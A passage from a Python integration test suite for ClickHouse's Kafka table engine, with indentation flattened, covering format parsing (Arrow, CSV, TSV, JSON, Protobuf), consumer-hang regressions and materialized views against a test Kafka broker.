# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# ],
# },
}
for format_name, format_opts in list(all_formats.items()):
print(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
print(('Checking {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce('issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce('issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="consumer_hang", num_partitions=8, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# print("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever while the application will execute queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="consumer_hang2", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# first consumer subscribe the topic, try to poll some data, and go to rest
instance.query('SELECT * FROM test.kafka')
# second consumer do the same leading to rebalance in the first
# consumer, try to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(120)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce('tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="empty", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages('pb', 0, 20)
kafka_produce_protobuf_messages('pb', 20, 1)
kafka_produce_protobuf_messages('pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(30)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
